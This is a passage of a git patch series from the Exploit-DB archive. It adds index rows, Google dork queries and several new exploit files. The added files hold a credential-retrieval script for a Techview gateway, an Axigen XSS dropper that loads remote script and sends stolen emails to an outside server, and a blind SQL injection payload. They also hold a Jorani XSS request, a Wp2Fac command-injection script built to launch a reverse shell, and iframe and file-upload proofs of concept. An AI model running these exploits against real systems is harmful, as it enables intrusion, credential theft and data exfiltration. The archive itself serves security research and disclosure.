 51152,exploits/php/webapps/51152.txt,"WPForms 1.7.8 - Cross-Site Scripting (XSS)",2023-03-30,"Milad karimi",webapps,php,,2023-03-30,2023-03-30,0,,,,,,
@@ -40065,6 +40078,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17607,exploits/windows/local/17607.rb,"FreeAmp 2.0.7 - '.fat' Local Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",local,windows,,2011-08-04,2011-08-06,1,,"Metasploit Framework (MSF)",,http://www.exploit-db.com/screenshots/idlt18000/17607.png,http://www.exploit-db.comfreeampsetup_2_0_7.exe,
 15727,exploits/windows/local/15727.py,"FreeAmp 2.0.7 - '.m3u' Local Buffer Overflow",2010-12-11,zota,local,windows,,2010-12-11,2011-06-23,1,OSVDB-72290,,,http://www.exploit-db.com/screenshots/idlt16000/freeamp.png,http://www.exploit-db.comfreeampsetup_2_0_7.exe,
 17449,exploits/windows/local/17449.py,"FreeAmp 2.0.7 - '.pls' Local Buffer Overflow",2011-06-24,"C4SS!0 G0M3S",local,windows,,2011-06-24,2011-06-25,1,,,,http://www.exploit-db.com/screenshots/idlt17500/screen-shot-2011-06-25-at-83233-am.png,http://www.exploit-db.comfreeampsetup_2_0_7.exe,
+51706,exploits/windows/local/51706.txt,"Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow",2023-09-04,"Waqas Ahmed Faroouqi",local,windows,,2023-09-04,2023-09-04,0,,,,,,
 48043,exploits/windows/local/48043.txt,"freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path",2020-02-11,boku,local,windows,,2020-02-11,2020-02-11,0,,,,,http://www.exploit-db.comfreeFTPd.exe,
 49630,exploits/windows/local/49630.txt,"FreeLAN 2.2 - 'FreeLAN Service' Unquoted Service Path",2021-03-09,"Mohammed Alshehri",local,windows,,2021-03-09,2021-03-09,0,,,,,,
 48044,exploits/windows/local/48044.txt,"FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path",2020-02-11,boku,local,windows,,2020-02-11,2020-02-11,0,,,,,http://www.exploit-db.comfreeSSHd.exe,
@@ -40324,6 +40338,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 11872,exploits/windows/local/11872.py,"KenWard's Zipper 1.400 - Local Buffer Overflow (2)",2010-03-25,sinn3r,local,windows,,2010-03-24,2011-01-03,1,OSVDB-63125,,,http://www.exploit-db.com/screenshots/idlt12000/screen-shot-2011-01-03-at-82314-pm.png,http://www.exploit-db.cominstzip3.exe,
 29374,exploits/windows/local/29374.txt,"Kerio Personal Firewall 4.3 - 'IPHLPAPI.dll' Local Privilege Escalation",2007-01-01,"Matousec Transparent security",local,windows,,2007-01-01,2013-11-11,1,CVE-2007-0081;OSVDB-33356,,,,,https://www.securityfocus.com/bid/21828/info
 50470,exploits/windows/local/50470.py,"Kingdia CD Extractor 3.0.2 - Buffer Overflow (SEH)",2021-11-02,stresser,local,windows,,2021-11-02,2021-11-02,0,,,,,http://www.exploit-db.comkingdia-cd-ex.exe,
+51707,exploits/windows/local/51707.txt,"Kingo ROOT 1.5.8 - Unquoted Service Path",2023-09-04,"Anish Feroz",local,windows,,2023-09-04,2023-09-04,0,,,,,,
 17561,exploits/windows/local/17561.c,"Kingsoft AntiVirus 2012 'KisKrnl.sys' 2011.7.8.913 - Kernel Mode Privilege Escalation",2011-07-22,MJ0011,local,windows,,2011-07-22,2019-03-07,0,,,,,,
 43421,exploits/windows/local/43421.py,"Kingsoft Antivirus/Internet Security 9+ - Local Privilege Escalation",2018-01-03,mr_me,local,windows,,2018-01-03,2018-01-15,1,,Local,,,,https://blogs.securiteam.com/index.php/archives/3597
 29922,exploits/windows/local/29922.py,"Kingsoft Office Writer 2012 8.1.0.3385 - '.wps' Local Buffer Overflow (SEH)",2013-11-30,"Julien Ahrens",local,windows,,2013-12-02,2013-12-02,1,CVE-2013-3934,,,http://www.exploit-db.com/screenshots/idlt30000/screen-shot-2013-12-02-at-105654.png,http://www.exploit-db.comoffice_suite_free_2012.exe,
@@ -41063,6 +41078,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 4703,exploits/windows/local/4703.pl,"NullSoft Winamp 5.32 - .MP4 Tags Stack Overflow",2007-12-08,"SYS 49152",local,windows,,2007-12-07,2016-10-25,1,OSVDB-41695;CVE-2007-6403,,,,http://www.exploit-db.comwinamp532_full.exe,
 14789,exploits/windows/local/14789.c,"NullSoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking",2010-08-25,LiquidWorm,local,windows,,2010-08-25,2010-08-25,1,CVE-2010-3137;OSVDB-67532,,,,http://www.exploit-db.comwinamp558_full_emusic-7plus_en-us.exe,
 6389,exploits/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 - '.m3u' File Local Stack Buffer Overflow",2008-09-06,"fl0 fl0w",local,windows,,2008-09-05,,1,OSVDB-47975;CVE-2008-4470,,,,,
+51700,exploits/windows/local/51700.txt,"NVClient v5.0 - Stack Buffer Overflow (DoS)",2023-09-04,"Ahmet Ümit BAYRAM",local,windows,,2023-09-04,2023-09-04,0,,,,,,
 24207,exploits/windows/local/24207.c,"Nvidia Display Driver Service (Nsvr) - Local Buffer Overflow",2013-01-18,"Jon Bailey",local,windows,,2013-01-18,2017-11-15,0,OSVDB-88745,,,,,
 14769,exploits/windows/local/14769.c,"Nvidia Driver - 'nview.dll' DLL Hijacking",2010-08-25,Encrypt3d.M!nd,local,windows,,2010-08-25,2010-08-25,0,OSVDB-67574,,nvidia-poc.rar,,,
 40660,exploits/windows/local/40660.txt,"NVIDIA Driver - NvStreamKms 'PsSetCreateProcessNotifyRoutineEx Local Stack Buffer Overflow Callback / Local Privilege Escalation",2016-10-31,"Google Security Research",local,windows,,2016-10-31,2016-10-31,1,CVE-2016-8812,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=918
@@ -43272,6 +43288,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34830,exploits/windows/remote/34830.c,"IsoBuster 2.7 - 'wnaspi32.dll' DLL Loading Arbitrary Code Execution",2010-10-10,Pepelux,remote,windows,,2010-10-10,2014-10-01,1,,,,,,https://www.securityfocus.com/bid/43912/info
 16464,exploits/windows/remote/16464.rb,"ISS - 'PAM.dll' ICQ Parser Buffer Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows,,2010-09-20,2011-03-10,1,CVE-2004-0362;OSVDB-4355,"Metasploit Framework (MSF)",,,,http://www.eeye.com/html/Research/Advisories/AD20040318.html
 20637,exploits/windows/remote/20637.txt,"itafrica webactive 1.0 - Directory Traversal",2001-02-16,slipy,remote,windows,,2001-02-16,2012-08-18,1,CVE-2001-0306;OSVDB-7706,,,,,https://www.securityfocus.com/bid/2386/info
+51699,exploits/windows/remote/51699.py,"Ivanti Avalanche <v6.4.0.0 - Remote Code Execution",2023-09-04,"Robel Campbell",remote,windows,,2023-09-04,2023-09-04,0,CVE-2023-32560,,,,,
 15655,exploits/windows/remote/15655.html,"J-Integra 2.11 - ActiveX SetIdentity() Buffer Overflow",2010-12-01,Dr_IDE,remote,windows,,2010-12-01,2010-12-01,1,,,,,,
 15648,exploits/windows/remote/15648.html,"J-Integra 2.11 - Remote Code Execution",2010-12-01,bz1p,remote,windows,,2010-12-01,2010-12-01,1,,,,,,
 20661,exploits/windows/remote/20661.txt,"jarle aase war ftpd 1.67 b04 - Directory Traversal",2001-03-06,se00020,remote,windows,,2001-03-06,2012-08-20,1,CVE-2001-0295;OSVDB-874,,,,,https://www.securityfocus.com/bid/2444/info

From fdcaa2b976cb3ef3ad11e63b8afda3b7b759823c Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Thu, 7 Sep 2023 00:16:27 +0000
Subject: [PATCH 13/17] DB: 2023-09-07

1 changes to exploits/shellcodes/ghdb

Blood Donor Management System v1.0 - Stored XSS
---
 files_exploits.csv | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/files_exploits.csv b/files_exploits.csv
index df666aeb8a..b5a776c7b3 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -14908,7 +14908,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 28574,exploits/php/webapps/28574.txt,"Blojsom 2.31 - Cross-Site Scripting",2006-09-14,"Avinash Shenoi",webapps,php,,2006-09-14,2013-09-27,1,CVE-2006-4829;OSVDB-28834,,,,,https://www.securityfocus.com/bid/20026/info
 5234,exploits/php/webapps/5234.txt,"Bloo 1.00 - Multiple SQL Injections",2008-03-11,MhZ91,webapps,php,,2008-03-10,2016-11-23,1,OSVDB-42778;CVE-2008-1313,,,,http://www.exploit-db.combloo.v.1.00.tgz,
 50362,exploits/php/webapps/50362.txt,"Blood Bank System 1.0 - Authentication Bypass",2021-10-01,"Nitin Sharma",webapps,php,,2021-10-01,2021-10-28,0,,,,,,
-51697,exploits/php/webapps/51697.txt,"Blood Donor Management System v1.0 - Stored XSS",2023-09-04,"Ehlullah Albayrak",webapps,php,,2023-09-04,2023-09-04,0,,,,,,
+51697,exploits/php/webapps/51697.txt,"Blood Donor Management System v1.0 - Stored XSS",2023-09-04,"Ehlullah Albayrak",webapps,php,,2023-09-04,2023-09-06,1,,,,,,
 47842,exploits/php/webapps/47842.txt,"BloodX 1.0 - Authentication Bypass",2020-01-02,riamloo,webapps,php,,2020-01-02,2020-02-07,1,,,,,,
 48786,exploits/php/webapps/48786.txt,"BloodX CMS 1.0 - Authentication Bypass",2020-09-03,BKpatron,webapps,php,,2020-09-03,2020-09-03,0,,,,,,
 4945,exploits/php/webapps/4945.txt,"bloofox 0.3 - SQL Injection / File Disclosure",2008-01-20,BugReport.IR,webapps,php,,2008-01-19,2016-10-27,1,OSVDB-40437;CVE-2008-0428;OSVDB-40436;CVE-2008-0427,,,,,http://bugreport.ir/?/27

From 54971d143bd1f1f2144fc532ded7474b3bb04023 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Fri, 8 Sep 2023 00:16:30 +0000
Subject: [PATCH 14/17] DB: 2023-09-08

1 changes to exploits/shellcodes/ghdb
---
 ghdb.xml | 30 ++++++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)

diff --git a/ghdb.xml b/ghdb.xml
index a49abf4b23..ce745b3cd5 100644
--- a/ghdb.xml
+++ b/ghdb.xml
@@ -33630,6 +33630,21 @@ Author: Luciano UNLP
   <date>2011-12-27</date>
   <author>anonymous</author>
  </entry>
+ <entry>
+  <id>8220</id>
+  <link>https://www.exploit-db.com/ghdb/8220</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>allintext:static/uploads</shortDescription>
+  <textualDescription># Google Dork: allintext:static/uploads
+# Files Containing Juicy Info
+# Date: 07/09/2023
+# Exploit Author: Affan Ali</textualDescription>
+  <query>allintext:static/uploads</query>
+  <querystring>https://www.google.com/search?q=allintext:static/uploads</querystring>
+  <edb></edb>
+  <date>2023-09-07</date>
+  <author>Affan Ali</author>
+ </entry>
  <entry>
   <id>6412</id>
   <link>https://www.exploit-db.com/ghdb/6412</link>
@@ -49042,6 +49057,21 @@ Author: Lord.TMR</textualDescription>
   <date>2019-09-03</date>
   <author>Abhishek Samaddar</author>
  </entry>
+ <entry>
+  <id>8221</id>
+  <link>https://www.exploit-db.com/ghdb/8221</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>inurl: /default.rdp</shortDescription>
+  <textualDescription># Google Dork: inurl: /default.rdp
+# Files Containing Juicy Info
+# Date: 07/09/2023
+# Exploit Author: Arjun Vijaypal Singh</textualDescription>
+  <query>inurl: /default.rdp</query>
+  <querystring>https://www.google.com/search?q=inurl: /default.rdp</querystring>
+  <edb></edb>
+  <date>2023-09-07</date>
+  <author>Arjun Vijaypal Singh</author>
+ </entry>
  <entry>
   <id>8183</id>
   <link>https://www.exploit-db.com/ghdb/8183</link>

From cbe784b08721bfff9f64fbf8ae7401b9a6261666 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Sat, 9 Sep 2023 00:16:33 +0000
Subject: [PATCH 15/17] DB: 2023-09-09

16 changes to exploits/shellcodes/ghdb

Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities

Axigen < 10.3.3.47_ 10.2.3.12 - Reflected XSS

Drupal 10.1.2 - web-cache-poisoning-External-service-interaction

Jorani v1.0.3-(c)2014-2023 - XSS Reflected & Information Disclosure

soosyze 2.0.0 - File Upload

SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection

Wordpress Plugin Elementor 3.5.5 - Iframe Injection

Wp2Fac - OS Command Injection

Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)

SyncBreeze 15.2.24 - 'login' Denial of Service

GOM Player 2.3.90.5360 - Buffer Overflow (PoC)

GOM Player 2.3.90.5360 - Remote Code Execution (RCE)

Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes)
---
 exploits/hardware/remote/51720.py   |  77 ++++++
 exploits/multiple/webapps/51722.txt |  80 ++++++
 exploits/php/webapps/51714.txt      |  41 +++
 exploits/php/webapps/51715.txt      | 108 ++++++++
 exploits/php/webapps/51716.txt      |  15 ++
 exploits/php/webapps/51717.py       |  38 +++
 exploits/php/webapps/51718.txt      |  42 ++++
 exploits/php/webapps/51723.txt      |  88 +++++++
 exploits/python/webapps/51676.py    |   2 -
 exploits/windows/dos/51725.py       |  35 +++
 exploits/windows/local/51724.py     |  29 +++
 exploits/windows/remote/51719.py    | 119 +++++++++
 files_exploits.csv                  |  13 +-
 files_shellcodes.csv                |   1 +
 ghdb.xml                            |  30 +++
 shellcodes/windows/51721.py         | 377 ++++++++++++++++++++++++++++
 16 files changed, 1092 insertions(+), 3 deletions(-)
 create mode 100755 exploits/hardware/remote/51720.py
 create mode 100644 exploits/multiple/webapps/51722.txt
 create mode 100644 exploits/php/webapps/51714.txt
 create mode 100644 exploits/php/webapps/51715.txt
 create mode 100644 exploits/php/webapps/51716.txt
 create mode 100755 exploits/php/webapps/51717.py
 create mode 100644 exploits/php/webapps/51718.txt
 create mode 100644 exploits/php/webapps/51723.txt
 create mode 100755 exploits/windows/dos/51725.py
 create mode 100755 exploits/windows/local/51724.py
 create mode 100755 exploits/windows/remote/51719.py
 create mode 100755 shellcodes/windows/51721.py

diff --git a/exploits/hardware/remote/51720.py b/exploits/hardware/remote/51720.py
new file mode 100755
index 0000000000..ee4a2e6d95
--- /dev/null
+++ b/exploits/hardware/remote/51720.py
@@ -0,0 +1,77 @@
+# Exploit Title: Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities
+# Google Dork: N/A
+# Date: 25/08/2023
+# Exploit Author: The Security Team [exploitsecurity.io<http://exploitsecurity.io>]
+# Vendor Homepage: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570
+# Software Link: N/A
+# Version: 1.0.19_T53
+# Tested on: MACOS/Linux
+# CVE : CVE-2023-34723
+# POC Code Available: https://www.exploitsecurity.io/post/cve-2023-34723-cve-2023-34724-cve-2023-34725
+
+#!/opt/homebrew/bin/python3
+
+import requests
+import sys
+from time import sleep
+from urllib3.exceptions import InsecureRequestWarning
+from colorama import init
+from colorama import Fore, Back, Style
+import re
+import os
+import ipaddress
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+def banner():
+    if os.name == 'posix':
+        clr_cmd = ('clear')
+    elif os.name == 'nt':
+        clr_cmd = ('cls')
+    os.system(clr_cmd)
+    print ("[+]****************************************************[+]")
+    print (" | Author      : The Security Team                      |")
+    print (" | Company     : "+Fore.RED+ "Exploit Security" +Style.RESET_ALL+"\t\t\t|")
+    print (" | Description : TechVIEW LA-5570 Directory Traversal   |")
+    print (" | Usage       : "+sys.argv[0]+" <target>              |")
+    print ("[+]****************************************************[+]")
+
+def usage():
+    print (f"Usage: {sys.argv[0]} <target>")
+
+def main(target):
+    domain = "http://"+target+"/config/system.conf"
+    try:
+        url = domain.strip()
+        r = requests.get(url, verify=False, timeout=3)
+        print ("[+] Retrieving credentials", flush=True, end='')
+        sleep(1)
+        print(" .", flush=True, end='')
+        sleep(1)
+        print(" .", flush=True, end='')
+        sleep(1)
+        print(" .", flush=True, end='')
+        if ("system_password" in r.text):
+            data =  (r.text.split("\n"))
+            print (f"\n{data[1]}")
+        else:
+            print (Fore.RED + "[!] Target is not vulnerable !"+ Style.RESET_ALL)
+    except TimeoutError:
+        print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)
+    except KeyboardInterrupt:
+        return
+    except requests.exceptions.Timeout:
+        print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)
+        return
+
+if __name__ == '__main__':
+    if len(sys.argv)>1:
+        banner()
+        target = sys.argv[1]
+        try:
+            validate = ipaddress.ip_address(target)
+            if (validate):
+                main (target)
+        except ValueError as e:
+            print (Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL)
+    else:
+        print (Fore.RED + f"[+] Not enough arguments, please specify target !" + Style.RESET_ALL)
\ No newline at end of file
diff --git a/exploits/multiple/webapps/51722.txt b/exploits/multiple/webapps/51722.txt
new file mode 100644
index 0000000000..4fe0cbfa82
--- /dev/null
+++ b/exploits/multiple/webapps/51722.txt
@@ -0,0 +1,80 @@
+# Exploit Title: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS
+# Google Dork: inurl:passwordexpired=yes
+# Date: 2023-08-21
+# Exploit Author: AmirZargham
+# Vendor Homepage: https://www.axigen.com/
+# Software Link: https://www.axigen.com/mail-server/download/
+# Version: (10.5.0–4370c946) and older version of Axigen WebMail
+# Tested on: firefox,chrome
+# CVE: CVE-2022-31470
+
+Exploit
+We use the second Reflected XSS to exploit this vulnerability, create a
+malicious link, and steal user emails.
+
+Dropper code
+This dropper code, loads and executes JavaScript exploit code from a remote
+server.
+
+');
+x = document.createElement('script');
+x.src = 'https://example.com/exploit.js';
+window.addEventListener('DOMContentLoaded',function y(){
+  document.body.appendChild(x)
+})//
+
+
+
+Encoded form
+
+/index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27
+https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})//
+
+
+Exploit code
+
+xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new
+XMLHttpRequest();
+oob_server = 'https://example.com/';
+var script_tag = document.createElement('script');
+
+xhr1.open('GET', '/', true);
+xhr1.onreadystatechange = () => {
+    if (xhr1.readyState === XMLHttpRequest.DONE) {
+        _h_cookie = new URL(xhr1.responseURL).search.split("=")[1];
+        xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,
+true);
+        xhr2.setRequestHeader('Content-Type', 'application/json');
+        xhr2.onreadystatechange = () => {
+            if (xhr2.readyState === XMLHttpRequest.DONE) {
+                if (xhr2.status === 401){
+                    script_tag.src =
+`${oob_server}?status=session_expired&domain=${document.domain}`;
+                    document.body.appendChild(script_tag);
+                } else {
+                    resp = xhr2.responseText;
+                    folderId = JSON.parse(resp)["mails"][0]["folderId"];
+                    xhr3.open('GET',
+`/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);
+                    xhr3.onreadystatechange = () => {
+                        if (xhr3.readyState === XMLHttpRequest.DONE) {
+                            emails = xhr3.responseText;
+                            script_tag.src =
+`${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;
+                            document.body.appendChild(script_tag);
+                        }
+                    };
+                    xhr3.send();
+                }
+            }
+        };
+        var body = JSON.stringify({isUnread: false});
+        xhr2.send(body);
+    }
+};
+xhr1.send();
+
+
+Combining dropper and exploit
+You can host the exploit code somewhere and then address it in the dropper
+code.
\ No newline at end of file
diff --git a/exploits/php/webapps/51714.txt b/exploits/php/webapps/51714.txt
new file mode 100644
index 0000000000..0d790e9a42
--- /dev/null
+++ b/exploits/php/webapps/51714.txt
@@ -0,0 +1,41 @@
+# Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection
+# Exploit Author: CraCkEr
+# Date: 20/08/2023
+# Vendor: SPA-Cart
+# Vendor Homepage: https://spa-cart.com/
+# Software Link: https://demo.spa-cart.com/
+# Version: 1.9.0.3
+# Tested on: Windows 10 Pro
+# Impact: Database Access
+# CVE: CVE-2023-4548
+# CWE: CWE-89 / CWE-74 / CWE-707
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+SQL injection attacks can allow unauthorized access to sensitive data, modification of
+data and crash the application or make it unavailable, leading to lost revenue and
+damage to a company's reputation.
+
+
+Path: /search
+
+GET parameter 'filter[brandid]' is vulnerable to SQL Injection
+
+https://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[SQLi]&filter[price]=100-500&filter[attr][Memory][]=500%20GB&filter[attr][Color][]=Black
+
+---
+Parameter: filter[brandid] (GET)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
+    Payload: filtered=1&q=11&load_filter=1&filter[brandid]=4'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z&filter[price]=100-500&filter[attr][Memory][]=500 GB&filter[attr][Color][]=Black
+---
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51715.txt b/exploits/php/webapps/51715.txt
new file mode 100644
index 0000000000..2bf7fd7260
--- /dev/null
+++ b/exploits/php/webapps/51715.txt
@@ -0,0 +1,108 @@
+## Title: Jorani v1.0.3-(c)2014-2023 - XSS Reflected & Information Disclosure
+## Author: nu11secur1ty
+## Date: 08/27/2023
+## Vendor: https://jorani.org/
+## Software: https://demo.jorani.org/session/login
+## Reference: https://portswigger.net/web-security/cross-site-scripting
+## Reference: https://portswigger.net/web-security/information-disclosure
+
+## Description:
+The value of the `language request` parameter is copied into a
+JavaScript string which is encapsulated in double quotation marks. The
+payload 75943";alert(1)//569 was submitted in the language parameter.
+This input was echoed unmodified in the application's response.
+The attacker can modify the token session and he can discover
+sensitive information for the server.
+
+STATUS: HIGH-Vulnerability
+
+[+]Exploit:
+```POST
+POST /session/login HTTP/1.1
+Host: demo.jorani.org
+Accept-Encoding: gzip, deflate
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111
+Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2;
+jorani_session=fbc630d2510ffdd2a981ccfe97301b1b90ab47dc#ATTACK
+Origin: http://demo.jorani.org
+Upgrade-Insecure-Requests: 1
+Referer: http://demo.jorani.org/session/login
+Content-Type: application/x-www-form-urlencoded
+Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
+Sec-CH-UA-Platform: Windows
+Sec-CH-UA-Mobile: ?0
+Content-Length: 183
+
+csrf_test_jorani=9b4b02ece59e0f321cd0324a633b5dd2&last_page=session%2Flogin&language=en-GBarh5l%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ennois&login=bbalet&CipheredValue=
+
+```
+
+[+]Response:
+```HTTP
+HTTP/1.1 200 OK
+date: Sun, 27 Aug 2023 06:03:04 GMT
+content-type: text/html; charset=UTF-8
+Content-Length: 681
+server: Apache
+x-powered-by: PHP/8.2
+expires: Thu, 19 Nov 1981 08:52:00 GMT
+cache-control: no-store, no-cache, must-revalidate
+pragma: no-cache
+set-cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2;
+expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/;
+SameSite=Strict
+set-cookie: jorani_session=9ae823ffa74d722c809f6bda69954593483f2cfd;
+expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; HttpOnly;
+SameSite=Lax
+last-modified: Sun, 27 Aug 2023 06:03:04 GMT
+vary: Accept-Encoding
+cache-control: private, no-cache, no-store, proxy-revalidate,
+no-transform, must-revalidate
+pragma: no-cache
+x-iplb-request-id: 3E497A1D:118A_D5BA2118:0050_64EAE718_12C0:1FBA1
+x-iplb-instance: 27474
+connection: close
+
+
+<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">
+
+<h4>A PHP Error was encountered</h4>
+
+<p>Severity: 8192</p>
+<p>Message:  strlen(): Passing null to parameter #1 ($string) of type
+string is deprecated</p>
+<p>Filename: controllers/Connection.php</p>
+<p>Line Number: 126</p>
+
+
+</div>
+<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">
+
+<h4>A PHP Error was encountered</h4>
+
+<p>Severity: Warning</p>
+<p>Message:  Cannot modify header information - headers already sent
+by (output started at
+/home/decouvric/demo.jorani.org/system/core/Exceptions.php:272)</p>
+<p>Filename: helpers/url_helper.php</p>
+<p>Line Number: 565</p>
+
+
+</div>
+```
+
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Jorani/2023/Jorani-v1.0.3-%C2%A92014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure)
+
+## Proof and Exploit:
+[href](https://www.nu11secur1ty.com/2023/08/jorani-v103-2014-2023-benjamin-balet.html)
+
+## Time spend:
+01:35:00
\ No newline at end of file
diff --git a/exploits/php/webapps/51716.txt b/exploits/php/webapps/51716.txt
new file mode 100644
index 0000000000..ab15b12553
--- /dev/null
+++ b/exploits/php/webapps/51716.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection
+# Date: 28.08.2023
+# Exploit Author: Miguel Santareno
+# Vendor Homepage: https://elementor.com/
+# Version: < 3.5.5
+# Tested on: Google and Firefox latest version
+# CVE : CVE-2022-4953
+
+# 1. Description
+The plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.
+
+
+# 2. Proof of Concept (PoC)
+Proof of Concept:
+https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K
\ No newline at end of file
diff --git a/exploits/php/webapps/51717.py b/exploits/php/webapps/51717.py
new file mode 100755
index 0000000000..88839f9d96
--- /dev/null
+++ b/exploits/php/webapps/51717.py
@@ -0,0 +1,38 @@
+# Exploit Title: Wp2Fac v1.0 - OS Command Injection
+# Date: 2023-08-27
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://github.com/metinyesil/wp2fac
+# Tested on: Kali Linux & Windows 11
+# CVE: N/A
+
+import requests
+
+def send_post_request(host, revshell):
+    url = f'http://{host}/send.php'
+    headers = {
+        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0)
+Gecko/20100101 Firefox/102.0',
+        'Accept': '*/*',
+        'Accept-Language': 'en-US,en;q=0.5',
+        'Accept-Encoding': 'gzip, deflate',
+        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
+        'X-Requested-With': 'XMLHttpRequest',
+        'Origin': f'http://{host}',
+        'Connection': 'close',
+        'Referer': f'http://{host}/',
+    }
+
+    data = {
+        'numara': f'1234567890 & {revshell} &;'
+    }
+
+    response = requests.post(url, headers=headers, data=data)
+    return response.text
+
+host = input("Target IP: ")
+
+revshell = input("Reverse Shell Command: ")
+
+print("Check your listener!")
+
+send_post_request(host, revshell)
\ No newline at end of file
diff --git a/exploits/php/webapps/51718.txt b/exploits/php/webapps/51718.txt
new file mode 100644
index 0000000000..cb13e44eb2
--- /dev/null
+++ b/exploits/php/webapps/51718.txt
@@ -0,0 +1,42 @@
+## Title: soosyze 2.0.0 - File Upload
+## Author: nu11secur1ty
+## Date: 04.26.2023-08.28.2023
+## Vendor: https://soosyze.com/
+## Software: https://github.com/soosyze/soosyze/releases/tag/2.0.0
+## Reference: https://portswigger.net/web-security/file-upload
+
+## Description:
+Broken file upload logic. The malicious user can upload whatever he
+wants to an HTML file and when he tries to execute it he views almost
+all
+file paths. This could be worse than ever, it depends on the scenario.
+
+STATUS: HIGH Vulnerability
+
+[+]Exploit:
+```HTML
+<!DOCTYPE html>
+<html>
+<head>
+<title>Hello broken file upload logic, now I can read your special
+directory pats, thank you ;)</title>
+</head>
+<body>
+<h1>
+	<?php
+		phpinfo();
+	?>
+	</h1>
+</body>
+</html>
+
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/soosyze/2023/soosyze-2.0.0)
+
+## Proof and Exploit:
+[href](https://www.nu11secur1ty.com/2023/05/soosyze-200-file-path-traversal-broken.html)
+
+## Time spend:
+01:27:00
\ No newline at end of file
diff --git a/exploits/php/webapps/51723.txt b/exploits/php/webapps/51723.txt
new file mode 100644
index 0000000000..f5e7dc3dfd
--- /dev/null
+++ b/exploits/php/webapps/51723.txt
@@ -0,0 +1,88 @@
+## Title: drupal-10.1.2 web-cache-poisoning-External-service-interaction
+## Author: nu11secur1ty
+## Date: 08/30/2023
+## Vendor: https://www.drupal.org/
+## Software: https://www.drupal.org/download
+## Reference: https://portswigger.net/kb/issues/00300210_external-service-interaction-http
+
+## Description:
+It is possible to induce the application to perform server-side HTTP
+requests to arbitrary domains.
